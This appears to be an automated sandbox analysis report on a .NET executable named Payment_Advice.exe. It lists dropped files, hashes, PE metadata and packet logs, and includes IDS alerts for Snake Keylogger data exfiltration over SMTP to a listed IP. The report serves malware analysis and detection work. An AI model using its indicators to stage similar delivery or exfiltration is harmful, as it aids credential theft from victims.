                                                    SSDEEP:384:7cY9IIpM9KK/tqd8GJUcQj8MRpfgGWNr49Kk8qTFKTpbacTUB8aE1EJY1/yDogwT:oW
                                                    MD5:90035F3ACDDB6B05B7A39E7282D8A843
                                                    SHA1:7B1F551D29B8E7979D25D31BD4344E99D7E18696
                                                    SHA-256:525EC9E8A070C938C98B76AA2533B6F4791A9C34045E2551679749843DC1DACA
                                                    SHA-512:787762D9F596F1BBCE2CAE4F6E1B69ECD4192D502C12A1B118D6535C9B9142346ACAEF9B95BB0F2AB7C5B18087A0DE0BCCD0BD46134D453B22D571C2A51F8075
                                                    Malicious:false
                                                    Preview:SessionID=09abd8c7-8e20-4434-9928-8825cb929d21.1714569431270 Timestamp=2024-05-01T15:17:11:270+0200 ThreadID=7716 Component=ngl-lib_NglAppLib Description="-------- Initializing session logs --------"..SessionID=09abd8c7-8e20-4434-9928-8825cb929d21.1714569431270 Timestamp=2024-05-01T15:17:11:271+0200 ThreadID=7716 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: No operating configs found"..SessionID=09abd8c7-8e20-4434-9928-8825cb929d21.1714569431270 Timestamp=2024-05-01T15:17:11:271+0200 ThreadID=7716 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: Fallback to NAMED_USER_ONLINE!!"..SessionID=09abd8c7-8e20-4434-9928-8825cb929d21.1714569431270 Timestamp=2024-05-01T15:17:11:271+0200 ThreadID=7716 Component=ngl-lib_NglAppLib Description="SetConfig: OS Name=WINDOWS_64, OS Version=10.0.19045.1"..SessionID=09abd8c7-8e20-4434-9928-8825cb929d21.1714569431270 Timestamp=2024-05-01T15:17:11:271+0200 ThreadID=7716 Component=ngl-lib_NglAppLib Description="SetConf

                                                    C:\Users\user\AppData\Local\Temp\acrobat_sbx\acroNGLLog.txt

                                                    Download File
                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                    File Type:ASCII text, with CRLF line terminators
                                                    Category:dropped
                                                    Size (bytes):35721
                                                    Entropy (8bit):5.409948720880984
                                                    Encrypted:false
                                                    SSDEEP:768:hRDD/ATOlQwlgR6RgRT4xk1Bh9+R6gRldy0+AyxkHBDgRh9gRc:hRDD/ATOlQwlgR6RgRT4xk1Bh9+R6gRW
                                                    MD5:D389049B18267087CDA342F54E299486
                                                    SHA1:717FCFAC73E136101843780D545E792F5A9BD46A
                                                    SHA-256:4B08B1A0E522A05FBEDF2A1F2D02D74405F9A8A0FC4A8042F42152B14AFAA9FB
                                                    SHA-512:BA610BFD7D606265DCD0FA0FCFDDB1DC6D09187B985E735636D89E9B78AF8102DE53BBEBB273D66ECD9B0EEB98813550BB33DC0BC102EAB3EE4F8D945FEABDD0
                                                    Malicious:false
                                                    Preview:05-10-2023 08:41:17:.---2---..05-10-2023 08:41:17:.AcroNGL Integ ADC-4240758 : ***************************************..05-10-2023 08:41:17:.AcroNGL Integ ADC-4240758 : ***************************************..05-10-2023 08:41:17:.AcroNGL Integ ADC-4240758 : ******** Starting new session ********..05-10-2023 08:41:17:.AcroNGL Integ ADC-4240758 : Starting NGL..05-10-2023 08:41:17:.AcroNGL Integ ADC-4240758 : Setting synchronous launch...05-10-2023 08:41:17:.AcroNGL Integ ADC-4240758 ::::: Configuring as AcrobatReader1..05-10-2023 08:41:17:.AcroNGL Integ ADC-4240758 : NGLAppVersion 23.6.20320.6..05-10-2023 08:41:17:.AcroNGL Integ ADC-4240758 : NGLAppMode NGL_INIT..05-10-2023 08:41:17:.AcroNGL Integ ADC-4240758 : AcroCEFPath, NGLCEFWorkflowModulePath - C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1 C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow..05-10-2023 08:41:17:.AcroNGL Integ ADC-4240758 : isNGLExternalBrowserDisabled - No..05-10-2023 08:41:17:.Closing File..05-10-

                                                    C:\Users\user\AppData\Local\Temp\acrocef_low\79871d27-0a6d-4cd6-b73d-e2d46aa9b4ce.tmp

                                                    Download File
                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                    File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 33081
                                                    Category:dropped
                                                    Size (bytes):1407294
                                                    Entropy (8bit):7.97605879016224
                                                    Encrypted:false
                                                    SSDEEP:24576:/xA7o5dpy6mlind9j2kvhsfFXpAXDgrFBU2/R077WLaGZ7YYIGNPpe:JVB3mlind9i4ufFXpAXkrfUs03WLaGZ4
                                                    MD5:C57D91A805775D5A645457EBBB9EAF26
                                                    SHA1:D407ABE7E7C9A9C78346CA781EB1B77E61060250
                                                    SHA-256:149A8DA0889E336CBA0CF06D34DDA729E69CA491E8B8FCEDD6C0DD5647BB6D43
                                                    SHA-512:1E7C93F0702D97F4E911C3EA029E599CF93BBA9C17156D95F1B301CA53C643F55582105E86572550C02E549A58841EEA64E038B7858703AF5453F1A37B1F3C29
                                                    Malicious:false
                                                    Preview:...........[.s.8..}.....!#..gw.n.`uNl.f6.3....d%EK.D["...#.......!)...r.$.G.......Z..u.._>.~....^e..<..u..........._D.r.Z..M.:...$.I..N.....\`.B.wj...:...E|.P..$ni.{.....T.^~<m-..J....RQk..*..f.....q.......V.rC.M.b.DiL\.....wq.*...$&j....O.........~.U.+..So.]..n..#OJ..p./..-......<...5..WB.O....i....<./T.P.L.;.....h.ik..D*T...<...j..o..fz~..~."...w&.fB...4..@[.g.......Y.>/M.".....-..N.{.2.....\....h..ER..._..(.-..o97..[.t:..>..W*..0.....u...?.%...1u..fg..`.Z.....m ~.GKG.q{.vU.nr..W.%.W..#z..l.T......1.....}.6......D.O...:....PX.......*..R.....j.WD).M..9.Fw...W.-a..z.l\..u*.^....*L..^.`.T...l.^.B.DMc.d....i...o.|M.uF|.nQ.L.E,.b!..NG.....<...J......g.o....;&5..'a.M...l..1.V.iB2.T._I....".+.W.yA ._.......<.O......O$."C....n!H.L`..q.....5..~./.._t.......A....S..3........Q[..+..e..P;...O...x~<B........'.)...n.$e.m.:...m.....&..Y.".H.s....5.9..A5)....s&.k0,.g4.V.K.,*.e....5...X.}6.P....y\.s|..Si..BB..y...~.....D^g...*7'T-.5*.!K.$\...2.

                                                    C:\Users\user\AppData\Local\Temp\acrocef_low\9f7c0cdb-c909-4e29-af04-38acd963e81f.tmp

                                                    Download File
                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                    File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 5111142
                                                    Category:dropped
                                                    Size (bytes):1419751
                                                    Entropy (8bit):7.976496077007677
                                                    Encrypted:false
                                                    SSDEEP:24576:/xA7owWLaGZDwYIGNPJodpy6mlind9j2kvhsfFXpAXDgrFBU2/R07D:JVwWLaGZDwZGk3mlind9i4ufFXpAXkru
                                                    MD5:18E3D04537AF72FDBEB3760B2D10C80E
                                                    SHA1:B313CD0B25E41E5CF0DFB83B33AB3E3C7678D5CC
                                                    SHA-256:BBEF113A2057EE7EAC911DC960D36D4A62C262DAE5B1379257908228243BD6F4
                                                    SHA-512:2A5B9B0A5DC98151AD2346055DF2F7BFDE62F6069A4A6A9AB3377B644D61AE31609B9FC73BEE4A0E929F84BF30DA4C1CDE628915AC37C7542FD170D12DE41298
                                                    Malicious:false
                                                    Preview:...........[.s.8..}.....!#..gw.n.`uNl.f6.3....d%EK.D["...#.......!)...r.$.G.......Z..u.._>.~....^e..<..u..........._D.r.Z..M.:...$.I..N.....\`.B.wj...:...E|.P..$ni.{.....T.^~<m-..J....RQk..*..f.....q.......V.rC.M.b.DiL\.....wq.*...$&j....O.........~.U.+..So.]..n..#OJ..p./..-......<...5..WB.O....i....<./T.P.L.;.....h.ik..D*T...<...j..o..fz~..~."...w&.fB...4..@[.g.......Y.>/M.".....-..N.{.2.....\....h..ER..._..(.-..o97..[.t:..>..W*..0.....u...?.%...1u..fg..`.Z.....m ~.GKG.q{.vU.nr..W.%.W..#z..l.T......1.....}.6......D.O...:....PX.......*..R.....j.WD).M..9.Fw...W.-a..z.l\..u*.^....*L..^.`.T...l.^.B.DMc.d....i...o.|M.uF|.nQ.L.E,.b!..NG.....<...J......g.o....;&5..'a.M...l..1.V.iB2.T._I....".+.W.yA ._.......<.O......O$."C....n!H.L`..q.....5..~./.._t.......A....S..3........Q[..+..e..P;...O...x~<B........'.)...n.$e.m.:...m.....&..Y.".H.s....5.9..A5)....s&.k0,.g4.V.K.,*.e....5...X.}6.P....y\.s|..Si..BB..y...~.....D^g...*7'T-.5*.!K.$\...2.

                                                    C:\Users\user\AppData\Local\Temp\acrocef_low\d1ee8daa-a8ce-4d69-b25f-47a9fefe7d26.tmp

                                                    Download File
                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                    File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 1111944
                                                    Category:dropped
                                                    Size (bytes):758601
                                                    Entropy (8bit):7.98639316555857
                                                    Encrypted:false
                                                    SSDEEP:12288:ONh3P65+Tegs6121D1ybxrr/IxkB1mabFhOXZ/fEa+fDERXTJJJJv+9UZwY0SWB4:O3Pjegf121DMNB1DofjEiJJJJm94GS84
                                                    MD5:FA6978A9EA472E8ACFF72AFE8CC7CC81
                                                    SHA1:D58155446B67ACF4DA331A977B8EC7BA105C2C4F
                                                    SHA-256:3D0DF2B14FC632520705424D2DA394922D3EDD8C977950656B736352CD5A37E2
                                                    SHA-512:6B16382E6A4B9EECB8E8FB82189C2741511E8CF99C83B3FA52B062165B3B366EE0C11A7F60CE4B08D881B2418234097FA13CCAA9C90B1D7D37BD4D9A56EBA96C
                                                    Malicious:false
                                                    Preview:...........kWT..0...W`.........b..@..nn........5.._..I.R3I..9g.x....s.\+.J......F...P......V]u......t....jK...C.fD..]..K....;......y._.U..}......S.........7...Q.............W.D..S.....y......%..=.....e..^.RG......L..].T.9.y.zqm.Q]..y..(......Q]..~~..}..q...@.T..xI.B.L.a.6...{..W..}.mK?u...5.#.{...n...........z....m^.6!.`.....u...eFa........N....o..hA-..s.N..B.q..{..z.{=..va4_`5Z........3.uG.n...+...t...z.M."2..x.-...DF..VtK.....o]b.Fp.>........c....,..t..an[............5.1.(}..q.q......K3.....[>..;e..f.Y.........mV.cL...]eF..7.e.<.._.o\.S..Z...`..}......>@......|.......ox.........h.......o....-Yj=.s.g.Cc\.i..\..A.B>.X..8`...P......[..O...-.g...r..u\...k..7..#E....N}...8.....(..0....w....j.......>.L....H.....y.x3...[>..t......0..z.qw..]X..i8..w.b..?0.wp..XH.A.[.....S..g.g..I.A.15.0?._n.Q.]..r8.....l..18...(.].m...!|G.1...... .3.`./....`~......G.............|..pS.e.C....:o.u_..oi.:..|....joi...eM.m.K...2%...Z..j...VUh..9.}.....

                                                    C:\Users\user\AppData\Local\Temp\acrocef_low\d8e14f58-9577-42bf-9621-9055a66d181f.tmp

                                                    Download File
                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                    File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 1311022
                                                    Category:dropped
                                                    Size (bytes):386528
                                                    Entropy (8bit):7.9736851559892425
                                                    Encrypted:false
                                                    SSDEEP:6144:8OSTJJJJEQ6T9UkRm1lBgI81ReWQ53+sQ36X/FLYVbxrr/IxktOQZ1mau4yBwsOo:sTJJJJv+9UZX+Tegs661ybxrr/IxkB1m
                                                    MD5:5C48B0AD2FEF800949466AE872E1F1E2
                                                    SHA1:337D617AE142815EDDACB48484628C1F16692A2F
                                                    SHA-256:F40E3C96D4ED2F7A299027B37B2C0C03EAEEE22CF79C6B300E5F23ACB1EB31FE
                                                    SHA-512:44210CE41F6365298BFBB14F6D850E59841FF555EBA00B51C6B024A12F458E91E43FDA3FA1A10AAC857D4BA7CA6992CCD891C02678DCA33FA1F409DE08859324
                                                    Malicious:false
                                                    Preview:...........]s[G. Z...{....;...J$%K&..%.[..k...S....$,.`. )Z..m........a.......o..7.VfV...S..HY}Ba.<.NUVVV~W.].;qG4..b,N..#1.=1.#1..o.Fb.........IC.....Z...g_~.OO.l..g.uO...bY.,[..o.s.D<..W....w....?$4..+..%.[.?..h.w<.T.9.vM.!..h0......}..H..$[...lq,....>..K.)=..s.{.g.O...S9".....Q...#...+..)>=.....|6......<4W.'.U.j$....+..=9...l.....S..<.\.k.'....{.1<.?..<..uk.v;.7n.!...g....."P..4.U........c.KC..w._G..u..g./.g....{'^.-|..h#.g.\.PO.|...]x..Kf4..s..............+.Y.....@.K....zI..X......6e?[..u.g"{..h.vKbM<.?i6{%.q)i...v..<P8P3.......CW.fwd...{:@h...;........5..@.C.j.....a.. U.5...].$.L..wW....z...v.......".M.?c.......o..}.a.9..A..%V..o.d....'..|m.WC.....|.....e.[W.p.8...rm....^..x'......5!...|......z..#......X_..Gl..c..R..`...*.s-1f..]x......f...g...k........g....... ).3.B..{"4...!r....v+As...Zn.]K{.8[..M.r.Y..........+%...]...J}f]~}_..K....;.Z.[..V.&..g...>...{F..{I..@~.^.|P..G.R>....U..../HY...(.z.<.~.9OW.Sxo.Y

                                                    C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp

                                                    Download File
                                                    Process:C:\Windows\System32\svchost.exe
                                                    File Type:JSON data
                                                    Category:dropped
                                                    Size (bytes):55
                                                    Entropy (8bit):4.306461250274409
                                                    Encrypted:false
                                                    SSDEEP:3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
                                                    MD5:DCA83F08D448911A14C22EBCACC5AD57
                                                    SHA1:91270525521B7FE0D986DB19747F47D34B6318AD
                                                    SHA-256:2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
                                                    SHA-512:96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
                                                    Malicious:false
                                                    Preview:{"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}

                                                    C:\Windows\Temp\hadvices.scr

                                                    Download File
                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                    Category:dropped
                                                    Size (bytes):1041408
                                                    Entropy (8bit):6.655555563448097
                                                    Encrypted:false
                                                    SSDEEP:12288:vjU00pFjzc/AKVH/bcZb8lSnnJ8HMiEJy5EDbRFd1Sch9hNiERMDUIPMbP:H0s39wuEJ8U1hVRMDUzbP
                                                    MD5:012DE24142F859797FBB5A25A7A3290D
                                                    SHA1:85D6C307D84921B5A914D083FDB7DB22F2AAE865
                                                    SHA-256:17E0BBF042B7403409739925E10C2FCF406C4DC269C189BCAABC8693A2F95D9B
                                                    SHA-512:B3A58F443FACAAC2571CDCB21D188D2716923C9405841310D674180D755EBA47FC34C2A027DBB67BC27FA733E9066A6809E9658EA90D919C4540E4B968F4C94F
                                                    Malicious:true
                                                    Yara Hits:
                                                    • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Windows\Temp\hadvices.scr, Author: Joe Security
                                                    Antivirus:
                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                    • Antivirus: ReversingLabs, Detection: 71%
                                                    • Antivirus: Virustotal, Detection: 35%, Browse
                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....3...............0.................. ........@.. .......................@............@.....................................S............................ ....................................................... ............... ..H............text...$.... ...................... ..`.rsrc...............................@..@.reloc....... ......................@..B........................H.......................D...............................................@....+.......>.."V...]...}..D...........@....+.."V..D........ .......,...+..'W...V..G.....................................@.......0.......................@.......0.......................@.......0.....Y.......~....".. ........................................._!._&._,._.._?._^._|._||._S.+.A.AA.ADV.AE.AEX.AH.AI...AN..AO.AOE.AOX...API.ASP.ATR.AU...AX.AXR.B.BB.BH.BIM.BVA.BVD.C.CC...CC2.CCK.CEN.CH...CH2.CJ.CT.C

                                                    Static File Info

                                                    General

                                                    File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                    Entropy (8bit):6.460820661403651
                                                    TrID:
                                                    • Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                                                    • Win32 Executable (generic) a (10002005/4) 49.97%
                                                    • Generic Win/DOS Executable (2004/3) 0.01%
                                                    • DOS Executable Generic (2002/1) 0.01%
                                                    • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                    File name:Payment_Advice.exe
                                                    File size:957'952 bytes
                                                    MD5:e708aa3160e224de971421d5bc2fee29
                                                    SHA1:7db6e4d3e5e2db1cd12717fa9a62a35a52834c02
                                                    SHA256:ba78d6ffbd1bd564598b33a3d28d437b3fe7129ffb93dee80e732e44098b9aa9
                                                    SHA512:47bff81600e4ff9e0a4fdbfa5f16141057bfca9fc0117cc2950428f6c627830482fc683c942a48ca77d37c3f4031d2585999453ce7c877eba6428cfe9ed2eff2
                                                    SSDEEP:12288:zjU00pFjzc/AKi9r4atz4fM3F58HMiEJy54ll8zhc6O6vo6Oh8IPMbP:L0s3iN4atkA/8Rze78zbP
                                                    TLSH:20156A593BE44657DDBA433F60EB49396BB9EC0A2213EB0F0381B57A3C13398D8515A7
                                                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....3...............0.................. ........@.. ....................................@................................

                                                    File Icon

                                                    Icon Hash:131313132b1fdf7a

                                                    Static PE Info

                                                    General

                                                    Entrypoint:0x4ea08e
                                                    Entrypoint Section:.text
                                                    Digitally signed:false
                                                    Imagebase:0x400000
                                                    Subsystem:windows gui
                                                    Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                    DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                    Time Stamp:0xDD330B0C [Thu Aug 7 15:51:40 2087 UTC]
                                                    TLS Callbacks:
                                                    CLR (.Net) Version:
                                                    OS Version Major:4
                                                    OS Version Minor:0
                                                    File Version Major:4
                                                    File Version Minor:0
                                                    Subsystem Version Major:4
                                                    Subsystem Version Minor:0
                                                    Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                    Entrypoint Preview

                                                    Instruction
                                                    jmp dword ptr [00402000h]
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al

                                                    Data Directories

                                                    NameVirtual AddressVirtual Size Is in Section
                                                    IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_IMPORT0xea0380x53.text
                                                    IMAGE_DIRECTORY_ENTRY_RESOURCE0xec0000x17de.rsrc
                                                    IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_BASERELOC0xee0000xc.reloc
                                                    IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                    IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                    Sections

                                                    NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                    .text0x20000xe80940xe8200644cabe1e754238fe79bcec5055a8acdFalse0.47247534666128166data6.463464649180666IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                    .rsrc0xec0000x17de0x1800edc62ffa8b8153a2c395be52c8763ecdFalse0.55712890625data5.839695724020961IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                    .reloc0xee0000xc0x200d125e5c7a86b1f9684280e3011c68b6cFalse0.044921875data0.10191042566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                    Resources

                                                    NameRVASizeTypeLanguageCountryZLIB Complexity
                                                    RT_ICON0xec1300x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 40960.6090525328330206
                                                    RT_GROUP_ICON0xed1d80x14data1.1
                                                    RT_VERSION0xed1ec0x408data0.3953488372093023
                                                    RT_MANIFEST0xed5f40x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5489795918367347

                                                    Imports

                                                    DLLImport
                                                    mscoree.dll_CorExeMain

                                                    Network Behavior

                                                    Snort IDS Alerts

                                                    TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                    05/01/24-15:18:36.864942TCP2044767ET TROJAN Snake Keylogger Exfil via SMTP49745587192.168.2.7108.167.142.65
                                                    05/01/24-15:18:34.721845TCP2044767ET TROJAN Snake Keylogger Exfil via SMTP49744587192.168.2.7108.167.142.65
                                                    05/01/24-15:18:41.126293TCP2044767ET TROJAN Snake Keylogger Exfil via SMTP49747587192.168.2.7108.167.142.65
                                                    05/01/24-15:18:39.013246TCP2044767ET TROJAN Snake Keylogger Exfil via SMTP49746587192.168.2.7108.167.142.65
                                                    05/01/24-15:18:23.398629TCP2044767ET TROJAN Snake Keylogger Exfil via SMTP49743587192.168.2.7108.167.142.65

                                                    Network Port Distribution

                                                    TCP Packets

                                                    TimestampSource PortDest PortSource IPDest IP
                                                    May 1, 2024 15:17:06.996691942 CEST49704443192.168.2.7172.67.141.195
                                                    May 1, 2024 15:17:06.996715069 CEST44349704172.67.141.195192.168.2.7
                                                    May 1, 2024 15:17:06.996799946 CEST49704443192.168.2.7172.67.141.195
                                                    May 1, 2024 15:17:07.006934881 CEST49704443192.168.2.7172.67.141.195
                                                    May 1, 2024 15:17:07.006953001 CEST44349704172.67.141.195192.168.2.7
                                                    May 1, 2024 15:17:07.223221064 CEST44349704172.67.141.195192.168.2.7
                                                    May 1, 2024 15:17:07.223295927 CEST49704443192.168.2.7172.67.141.195
                                                    May 1, 2024 15:17:07.226128101 CEST49704443192.168.2.7172.67.141.195
                                                    May 1, 2024 15:17:07.226140022 CEST44349704172.67.141.195192.168.2.7
                                                    May 1, 2024 15:17:07.226448059 CEST44349704172.67.141.195192.168.2.7
                                                    May 1, 2024 15:17:07.236176968 CEST49704443192.168.2.7172.67.141.195
                                                    May 1, 2024 15:17:07.280107975 CEST44349704172.67.141.195192.168.2.7
                                                    May 1, 2024 15:17:07.890074015 CEST44349704172.67.141.195192.168.2.7
                                                    May 1, 2024 15:17:07.890125990 CEST44349704172.67.141.195192.168.2.7
                                                    May 1, 2024 15:17:07.890152931 CEST44349704172.67.141.195192.168.2.7
                                                    May 1, 2024 15:17:07.890171051 CEST49704443192.168.2.7172.67.141.195
                                                    May 1, 2024 15:17:07.890178919 CEST44349704172.67.141.195192.168.2.7
                                                    May 1, 2024 15:17:07.890196085 CEST44349704172.67.141.195192.168.2.7
                                                    May 1, 2024 15:17:07.890249014 CEST49704443192.168.2.7172.67.141.195
                                                    May 1, 2024 15:17:07.890269041 CEST44349704172.67.141.195192.168.2.7
                                                    May 1, 2024 15:17:07.890297890 CEST44349704172.67.141.195192.168.2.7
                                                    May 1, 2024 15:17:07.890312910 CEST49704443192.168.2.7172.67.141.195
                                                    May 1, 2024 15:17:07.890321016 CEST44349704172.67.141.195192.168.2.7
                                                    May 1, 2024 15:17:07.890357971 CEST49704443192.168.2.7172.67.141.195
                                                    May 1, 2024 15:17:07.890650988 CEST44349704172.67.141.195192.168.2.7
                                                    May 1, 2024 15:17:07.890734911 CEST44349704172.67.141.195192.168.2.7
                                                    May 1, 2024 15:17:07.890760899 CEST44349704172.67.141.195192.168.2.7
                                                    May 1, 2024 15:17:07.890774965 CEST49704443192.168.2.7172.67.141.195
                                                    May 1, 2024 15:17:07.890790939 CEST44349704172.67.141.195192.168.2.7
                                                    May 1, 2024 15:17:07.890830040 CEST49704443192.168.2.7172.67.141.195
                                                    May 1, 2024 15:17:07.891176939 CEST44349704172.67.141.195192.168.2.7
                                                    May 1, 2024 15:17:07.944483042 CEST44349704172.67.141.195192.168.2.7
                                                    May 1, 2024 15:17:07.944528103 CEST49704443192.168.2.7172.67.141.195
                                                    May 1, 2024 15:17:07.944535971 CEST44349704172.67.141.195192.168.2.7
                                                    May 1, 2024 15:17:07.944670916 CEST44349704172.67.141.195192.168.2.7
                                                    May 1, 2024 15:17:07.944709063 CEST49704443192.168.2.7172.67.141.195
                                                    May 1, 2024 15:17:07.944717884 CEST44349704172.67.141.195192.168.2.7
                                                    May 1, 2024 15:17:07.944992065 CEST44349704172.67.141.195192.168.2.7
                                                    May 1, 2024 15:17:07.945030928 CEST49704443192.168.2.7172.67.141.195
                                                    May 1, 2024 15:17:07.945039988 CEST44349704172.67.141.195192.168.2.7
                                                    May 1, 2024 15:17:07.945070982 CEST44349704172.67.141.195192.168.2.7
                                                    May 1, 2024 15:17:07.945121050 CEST49704443192.168.2.7172.67.141.195
                                                    May 1, 2024 15:17:07.945127964 CEST44349704172.67.141.195192.168.2.7
                                                    May 1, 2024 15:17:07.945596933 CEST44349704172.67.141.195192.168.2.7
                                                    May 1, 2024 15:17:07.945641041 CEST44349704172.67.141.195192.168.2.7
                                                    May 1, 2024 15:17:07.945667028 CEST49704443192.168.2.7172.67.141.195
                                                    May 1, 2024 15:17:07.945667028 CEST44349704172.67.141.195192.168.2.7
                                                    May 1, 2024 15:17:07.945678949 CEST44349704172.67.141.195192.168.2.7
                                                    May 1, 2024 15:17:07.945709944 CEST49704443192.168.2.7172.67.141.195
                                                    May 1, 2024 15:17:07.992554903 CEST49704443192.168.2.7172.67.141.195
                                                    May 1, 2024 15:17:08.007276058 CEST44349704172.67.141.195192.168.2.7
                                                    May 1, 2024 15:17:08.007392883 CEST44349704172.67.141.195192.168.2.7
                                                    May 1, 2024 15:17:08.007416010 CEST44349704172.67.141.195192.168.2.7
                                                    May 1, 2024 15:17:08.007431984 CEST49704443192.168.2.7172.67.141.195
